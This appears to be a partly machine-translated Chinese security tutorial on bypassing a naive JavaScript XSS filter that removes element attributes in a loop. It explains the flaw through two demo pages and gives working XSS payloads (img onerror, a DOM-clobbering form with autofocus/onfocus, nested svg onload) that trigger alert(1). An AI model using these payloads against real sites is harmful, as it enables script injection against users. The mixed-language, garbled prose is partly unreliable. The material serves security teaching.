一次循环--demo6.html

<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
    <form id=x>
        <input id=attributes>
        <input id=attributes>
    </form>
</body>
<script>
    console.info(x.attributes);
    const data = decodeURIComponent(location.hash.substr(1));
    const root = document.createElement('div');
    root.innerHTML = data;

    //这里模拟了XSS过滤的过程,方法是移除所有属性
    for (let el of root.querySelectorAll('*')) {
        for (let attr of el.attributes) {
            el.removeAttribute(attr.name);
        }
    }
    document.body.appendChild(root); 
</script>

代码分析

    const data = decodeURIComponent(location.hash.substr(1));       #截取#号后面的值
    const root = document.createElement('div');       #创建一个div
    root.innerHTML = data;        #然后将#The value after the number is assigned todiv
    for (let el of root.querySelectorAll('*')) {  #选中div下面的所有子元素
        for (let attr of el.attributes) {           #Get all attributes of child elements
            el.removeAttribute(attr.name);   #Delete all acquired properties

测试结果

我们传递了<img src=1 οnerrοr=alert(1)>

 但是却发现src=1的属性被删除了,οnerrοr=alert(1)properties are still preserved,这是为什么呢？Let's first understand the deletion order here.We use breakpoint debugging to test the sequence of it

Let's first debug the situation to see the value step by step,通过断点调试,我们发现srcIt was removed after entering it as the first attribute,剩下的属性onerror仅一位,However, when the number of loops is greater than the number of strings, the attribute cannot be deleted.

我们使用一个pythonThe code tests the order in which elements are removed：

我们发现在a数组下,We just took out3个值,In anticipation we should take out6个值,This is why it should be deleted while looping. 

 这就有很大的问题,Because when deleting elements, we don't know which elements are deleted because of the index problem,So we only need to make multiple attempts to bypass a loop：

<img test=aaa src=1 title=bbb οnerrοr=alert(1)>

两次循环--demo4.html

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
    
</body>
<script>
    const data = decodeURIComponent(location.hash.substr(1));;
    const root = document.createElement('div');
    root.innerHTML = data;
   
    // 这里模拟了XSS过滤的过程,方法是移除所有属性,sanitizer
    for (let el of root.querySelectorAll('*')) {
     let attrs = [];
     for (let attr of el.attributes) {
      attrs.push(attr.name);
     }
     for (let name of attrs) {
      el.removeAttribute(name);
     }
    }    
     document.body.appendChild(root); 
</script>
</html>

The problem of the two loops is to put the attributes into an array first and then delete them,At this time, there is no one-cycle problem.

So we use two methods to bypass.

绕过方法1：DOM cobbing

The stuff that will enter the loop is not put into the code we need,That way it doesn't matter if you delete it

Then if we let the unused properties enter the loop,What is needed has not entered the loop yet？

tabindex：全局属性,指示其元素是否可以聚焦,and where does it participate in sequential keyboard navigation.使用Tab键获取焦点.

<form%20 tabindex=1 οnfοcus="alert(1);this.removeAttribute('onfocus'); "autofocus="true"><input name=attributes><input name=attributes></form>

 这样就是将<form%20 tabindex=1 οnfοcus="alert(1);this.removeAttribute('onfocus'); "autofocus="true">Triggered,Deleted is the latter<input>里面的属性.

绕过方法2：不进循环

<svg><svg/οnlοad=alert(1)>

 为什么一个<svg>没有成功,Two were successful？It can be before the filter code is executed,Execute malicious code ahead of time.

        svg标签会阻塞DOM的构造.JSright in the environmentDOMThe operation again causes backflow,为DOMTree construction causes additional effects.在script标签内的JS执行完毕以后,DOM树才会构建完成,Only then will the following content be loaded,Then it will be triggered when an error is found in loading the contenterror事件.

That is, the malicious code has been executed before entering the loop,So it doesn't make sense whether to enter the loop or not.